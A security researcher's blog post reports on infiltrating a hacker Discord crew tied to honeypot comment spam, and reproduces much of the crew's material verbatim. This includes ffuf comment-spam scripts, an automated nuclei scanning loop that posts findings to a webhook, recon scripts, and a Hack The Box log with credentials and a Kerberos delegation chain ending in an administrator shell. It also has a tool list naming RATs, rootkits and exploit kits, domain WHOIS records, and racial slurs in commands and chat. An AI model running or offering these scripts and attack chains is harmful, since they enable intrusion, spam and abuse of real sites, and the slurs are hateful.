|
|
Analysis Tech Art Repositories | |||||||
Mon Oct 9 18:54:14 2023
(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)
https://bcable.net/analysis-ukr-prelim.html
https://bcable.net/analysis-ukr-graphs.html
https://bcable.net/analysis-ukr-indicators.html
https://bcable.net/analysis-ukr-ru_map_sessions.html
https://bcable.net/analysis-ukr-cn_map_sessions.html
https://bcable.net/analysis-ukr-miori_fail.html
https://bcable.net/analysis-ukr-botnet_perl.html
https://bcable.net/analysis-ukr-ddos_gh0st.html
https://bcable.net/analysis-ukr-indicators_2023.html
https://bcable.net/analysis-ukr-crew_001.html
https://bcable.net/analysis-ukr-inventory_attack.html
https://bcable.net/analysis-ukr-crew_002.html
stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&email=##redacted-site##%40gmail.com&url=https://##redacted-site##/&submit=Post+Comment&comment_post_ID=1&comment_parent=0&wp-comment-cookies-consent=true'),
I randomly tracked the following redacted log down to a Discord invite, then “socially engineered” my way into the chat. Inside the initial “halt who goes there” access restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced peoplei totalling about 20 people. I ignored most of it, wasn’t really relevant since it was mostly just exchanging racist nonsense. Plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:
“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”
wget -c s3.amazonaws.com/alexa-static/top-1m.csv.zip
unzip top-1m.csv.zip
cd top-1m.csv
cat top-1m.csv | sed -e "s/.*,//g" > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
cat top1mhttp.txt | head -n 100000 > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
cat workinghttp.txt | jq .results[].url | tr -d '"' | sort -u | uniq >top1mworkinghttp.txt
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
cat wp-comments-post.json | jq .results[].url | tr -d '"' >wp-comments-post.txt (edited)
“[11/16/2022 5:27 AM] Screen quick cheatsheet:”
screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)
“Making backlinks with ffuf”
ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer: http://yoursite.com/" -d "comment=hello+world&author=hey&email=hey%40gmail.com&url=http%3A%2F%2Fyoursite.com%2F&submit=Post+Comment&comment_post_ID=5&comment_parent=0" -H "User-Agent: Mozilla/5.0 (Firefox)"
Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself, they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate out of mostly Bangladesh but this group mostly spoke Portuguese it seemed.
I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.
Here is another project which seems to send a generic JSON webhook to mass targets. Takes things off HackerOne datasets and uses nuclei to attempt to exploit, so things should be acceptable targets.
/usr/bin/getallscope
#!/usr/bin/python3
import json
import requests
import random
url = "https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/main/data/hackerone_data.json"
r = requests.get(url=url)
fullz = []
datas = json.loads(r.text)
for data in datas:
if not "targets" in data: continue
for target in data["targets"]["in_scope"]:
if not target["asset_identifier"].startswith("*."): continue
if not target["eligible_for_bounty"] == True: continue
if not target["eligible_for_submission"] == True: continue
fullz.append(target["asset_identifier"].replace("*.", ""))
random.shuffle(fullz)
print("\n".join(fullz))
/usr/bin/getrandscope
#!/bin/bash
getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile
/usr/bin/autopwn
#!/bin/bash
rm probed;
rm foundvuln.txt;
rm tmpfile;
getrandscope;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;
/usr/bin/sendwebhook (change webhook url to yours)
#!/bin/bash
argstr=$@;
argstr=$(echo $argstr | tr -d '"');
echo $argstr;
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "{\"name\":\"hello\", \"content\":\"$argstr\"}";
sleep 2;
/usr/bin/pwnforever
#!/bin/bash
while true; do
autopwn;
done
“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”
nohup pwnforever &
“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”
“takes urls from stdin and prints only the ones with unique parameter names”
#!/usr/bin/python3
import sys
urlparamlist = []
def getpath(url):
if not "://" in url: return ""
urll = url.split("://")[1]
urll = "/".join(urll.split("/")[1:])
if "?" in urll: urll = urll.split("?")[0]
return urll
def alreadyparam(url):
global urlparamlist
paramsfull = ""
urlparams = url.split("?")
if len(urlparams) > 1:
urlparams = urlparams[1]
else:
urlparams = ""
paramsfull += getpath(url)
for urlparam in urlparams.split("&"):
if not "=" in urlparam: continue
else: urlparam = urlparam.split("=")[0]
paramsfull += "{}".format(urlparam)
if not paramsfull in urlparamlist:
urlparamlist.append(paramsfull)
return 0
else:
return 1
for url in sys.stdin:
url = url.strip()
if not alreadyparam(url):
print(url)
“example:”
cat all_urls.txt | python uniqparam.py > unique_param.txt
function grabipranges() {
full = "";
var links = document.getElementsByTagName("a");
for(let i = 0; i < links.length; i++) {
if(!links[i].href) continue;
if(links[i].href.indexOf("/prefix/") == -1) continue;
if(links[i].href.indexOf("::") !== -1) continue;
full += links[i].href.split("prefix/")[1] + " ";
}
console.log(full);
}
grabipranges();
“little script to grab all ip ranges from bgp.tools”
#!/bin/bash
if [[ $# < 1 ]]; then
echo "$0 <domain>";
exit;
fi
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null; then
sudo apt install assetfinder;
fi
if ! which getallurls &>/dev/null; then
sudo apt install getallurls;
fi
if ! which nmap &>/dev/null; then
sudo apt install nmap;
fi
if ! which httprobe &>/dev/null; then
sudo apt install nmap;
fi
if ! which dirsearch &>/dev/null; then
sudo apt install dirsearch;
fi
echo "Cleaning up previous scan files...";
rm assetsfound.txt &>/dev/null;
rm all_urls.txt &>/dev/null;
rm nmap-scan.txt &>/dev/null;
rm assetsworking.txt &>/dev/null;
rm dirsearched.txt &>/dev/null;
rm customwordlist.txt &>/dev/null;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only $1 | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
cat assetsfound.txt | sort -u | uniq > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
cat assetsworking.txt | sort -u | uniq > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
for i in $(cat assetsworking.txt); do curl $i --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
cat customwordlist.txt | sort -u | uniq > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls $i | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";
#!/usr/bin/python3
import sys
urlparamlist = []
def getpath(url):
if not "://" in url: return ""
urll = url.split("://")[1]
urll = "/".join(urll.split("/")[1:])
if "?" in urll: urll = urll.split("?")[0]
return urll
def getbase(url):
schema = url.split("://")[0]
url = url.split("://")[1]
if "/" in url: url = url.split("/")[0]
fullurl = "{}://{}/".format(schema, url)
return fullurl
def alreadyparam(url):
global urlparamlist
paramsfull = ""
urlparams = url.split("?")
if len(urlparams) > 1:
urlparams = urlparams[1]
else:
urlparams = ""
paramsfull += getpath(url)+"?"
for urlparam in urlparams.split("&"):
if not "=" in urlparam: continue
else: urlparam = urlparam.split("=")[0]
paramsfull += "{}={}&".format(urlparam, sys.argv[1])
paramsfull = "&".join(paramsfull.split("&")[:-1])
if not paramsfull in urlparamlist:
urlparamlist.append(paramsfull)
print(getbase(url)+paramsfull)
return 0
else:
return 1
for url in sys.stdin:
url = url.strip()
alreadyparam(url)
“generate custom wordlist from cewl output”
cat cewld.txt | python3 wordg.py > generated.txt
import sys
words = []
for line in sys.stdin:
words.append(line.strip())
def mk(lower=False):
for word in words:
for word2 in words:
if word == word2: continue
if lower == True:
word = word.lower()
word2 = word2.lower()
print("{}{}".format(word, word2))
print("{}-{}".format(word, word2))
print("{}.{}".format(word, word2))
print("{}_{}".format(word, word2))
words = list(set(words))
print(mk())
print(mk(lower=True))
These I believe are logs of their CTF challenge successes.
Nmap scan report for 10.10.11.174
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 46499/tcp): CLEAN (Timeout)
| Check 2 (port 19493/tcp): CLEAN (Timeout)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 55678/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-10-31T19:18:57
|_ start_date: N/A
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| guest@support.htb
|_ administrator@support.htb
SMB dc.support.htb 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB dc.support.htb 445 DC [+] support.htb\guest:
SMB dc.support.htb 445 DC [+] Enumerated shares
SMB dc.support.htb 445 DC Share Permissions Remark
SMB dc.support.htb 445 DC ----- ----------- ------
SMB dc.support.htb 445 DC ADMIN$ Remote Admin
SMB dc.support.htb 445 DC C$ Default share
SMB dc.support.htb 445 DC IPC$ READ Remote IPC
SMB dc.support.htb 445 DC NETLOGON Logon server share
SMB dc.support.htb 445 DC support-tools READ support staff tools
SMB dc.support.htb 445 DC SYSVOL Logon server share
CREDS:
ldap
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Version]
signature="$CHICAGO$"
Revision=1
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,2
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Unicode]
Unicode=yes
[Registry Values]
MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\LDAPServerIntegrity=4,1
MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\RequireSignOrSeal=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature=4,1
MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\EnableSecuritySignature=4,1
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544
[Version]
signature="$CHICAGO$"
Revision=1
support
smith.rosario
hernandez.stanley
wilson.shelby
anderson.damian
thomas.raphael
levine.leopoldo
raven.clifton
bardot.mary
cromwell.gerard
monroe.david
west.laura
langley.lucy
daughtler.mabel
stoll.rachelle
ford.victoria
CREDS
support
Ironside47pleasure40Watchful
LOGIN PS
evil-winrm -i dc.support.htb -u support
REMOTE
New-MachineAccount -MachineAccount "NIGGER" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "NIGGER$"
.\Rubeus.exe hash /password:123456 /user:NIGGER$ /domain:support.htb
LOCAL
impacket-getST support.htb/NIGGER$ -spn http/dc.support.htb -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip dc.support.htb
export KRB5CCNAME=administrator.ccache
impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
ROOTT FUCCKING FINNAALLYY NIGGGGERRRR
how to get
[img of i3 for kali]
- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot
Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm.
Apparently using the control code \x0a as a username will be accepted by Discord (UPDATE: not true anymore), but make a blank username. This was used by a non-core member of said crew.
https://book.hacktricks.xyz/welcome/readme
https://cheatsheetseries.owasp.org/
https://github.com/danielmiessler/SecLists
https://github.com/vavkamil/awesome-bugbounty-tools
dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools its a must have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories
https://cyberchef.org/ - mess with various data formats and encodings (great tool)
https://check-host.net/ - check availability of hosts, tcp and udp ports, ping, geolocation and more
https://bgp.tools/ - bgp tools
https://bgp.he.net/ - even more bgp tools
https://dehashed.com/ - service to find passwords from breaches
https://www.whoxy.com/ - whois history, reverse whois and other whois tools
crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration
masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http
linpeas - privilege escalation and info gathering script works every time (ok 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding
powershell-empire - c2/post exploitation framweork with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux
rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb
Google - the most powerful of them all..
doxtool.py - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files
hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols
Wyd.pl - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt
Exploitation Tools:
metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line
Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in miliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent
x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering
pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates
Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old style “1337-speak” is no longer a thing, and broken english is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface), many common influencers were common tactics. This provided for very expressive “reactive” people that were easily memeable and easy to communicate via GIFs. The way I stayed on was adopting an identity of my own, and I will keep that identity to myself.
Eventually a link was posted to https://skidson.online/admin.php which provided a ton of other DNS entries.
Description provided of features:
- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim
These are some of the more sanitized chat/meme examples:
Arrow/goober meme is a common meme from discord.gg/cats. Coordinates are of Raven Rock Mountain Complex in Pennsylvania:
https://en.wikipedia.org/wiki/Raven_Rock_Mountain_Complex
Redacted the final location as I’ll be doing a more in-depth analysis much later of Matrix with over 1GB of raw text to analyze and graph of extremist groups, largely not from this crew.
Not much was gleaned there anyway, as it was eventually removed. They had a code name for their hidey hole:
But I did manage to coerce a link to it from someone:
My assessment was that I wouldn’t be able to join a server with six members without being figured out, and it would have jeopardized the other extremism research I am still doing.
skidson.online. 300 IN A 172.67.181.198
skidson.online. 300 IN A 104.21.35.252
Domain Name: SKIDSON.ONLINE
Registry Domain ID: D164729351-CNIC
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://cloudflare.com
Updated Date: 2022-01-20T16:10:46.0Z
Creation Date: 2020-01-20T21:13:35.0Z
Registry Expiry Date: 2024-01-20T23:59:59.0Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: Skidson
Registrant State/Province: Lisbon
Registrant Country: PT
blackhatseo.win. 297 IN A 104.21.86.207
blackhatseo.win. 297 IN A 172.67.136.208
Registry Domain ID: DC554398F83D34DCE86218FFB922AE69B-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-20T23:59:30Z
Creation Date: 2022-01-22T02:33:23Z
Registry Expiry Date: 2023-01-22T02:33:23Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT
splog.win. 300 IN A 104.21.88.21
splog.win. 300 IN A 172.67.171.249
Domain Name: splog.win
Registry Domain ID: DF4AAD8EE7359417AAE90173EF832CFE0-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-20T22:57:15Z
Creation Date: 2022-02-15T05:00:50Z
Registry Expiry Date: 2023-02-15T05:00:50Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT
feetporn.win. 300 IN A 104.21.3.50
feetporn.win. 300 IN A 172.67.130.64
Domain Name: feetporn.win
Registry Domain ID: DCF7AC62B00DD49518ACA532DE234EC80-GDREG
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: www.cloudflare.com
Updated Date: 2022-09-21T00:45:15Z
Creation Date: 2022-01-19T00:56:56Z
Registry Expiry Date: 2023-01-19T00:56:56Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Skidson
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Lisbon
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: PT
aqw.icu. 300 IN A 172.67.129.37
aqw.icu. 300 IN A 104.21.2.119
Domain Name: AQW.ICU
Registry Domain ID: D316305496-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:52:30.0Z
Creation Date: 2022-08-06T16:14:56.0Z
Registry Expiry Date: 2023-08-06T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
aqw.monster. 300 IN A 172.67.196.176
aqw.monster. 300 IN A 104.21.52.73
[Querying whois.internic.net]
[whois.internic.net]
No match for domain "AQW.MONSTER".
aqworlds.live. 300 IN A 172.67.140.121
aqworlds.live. 300 IN A 104.21.70.236
[Querying whois.rightside.co]
[whois.rightside.co]
aqworlds.top. 300 IN A 104.21.37.222
aqworlds.top. 300 IN A 172.67.213.234
Domain Name: aqworlds.top
Registry Domain ID: D20220807G10001G_85842468-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-08-06T16:20:30Z
Creation Date: 2022-08-06T16:14:56Z
Registry Expiry Date: 2023-08-06T16:14:56Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
aqworlds.xyz. 300 IN A 172.67.142.194
aqworlds.xyz. 300 IN A 104.21.95.37
Domain Name: AQWORLDS.XYZ
Registry Domain ID: D316305490-CNIC
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-09-09T14:52:30.0Z
Creation Date: 2022-08-06T16:14:56.0Z
Registry Expiry Date: 2023-08-06T23:59:59.0Z
Registrar: NameSilo, LLC
Registrar IANA ID: 1479
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: See PrivacyGuardian.org
Registrant State/Province: AZ
Registrant Country: US
chat-online.top. 300 IN A 172.67.183.203
chat-online.top. 300 IN A 104.21.48.101
Domain Name: chat-online.top
Registry Domain ID: D20220723G10001G_85022334-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2022-07-22T16:17:08Z
Creation Date: 2022-07-22T16:11:30Z
Registry Expiry Date: 2023-07-22T16:11:30Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
Registrar Abuse Contact Phone: +1.4805240066
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: See PrivacyGuardian.org
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AZ
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
ddos-booter.top. 300 IN A 104.21.38.212
ddos-booter.top. 300 IN A 172.67.168.125
Domain Name: ddos-booter.top
Registry Domain ID: D20230113G10001G_94524448-top
Registrar WHOIS Server: whois.namesilo.com
Registrar URL: https://www.namesilo.com
Updated Date: 2023-01-12T16:16:05Z
Creation Date: 2023-01-12T16:03:29Z
Registry Expiry Date: 2024-01-12T16:03:29Z
Registrar: NameSilo,LLC
Registrar IANA ID: 1479
Registrar Abuse Contact Email: abuse@namesilo.com
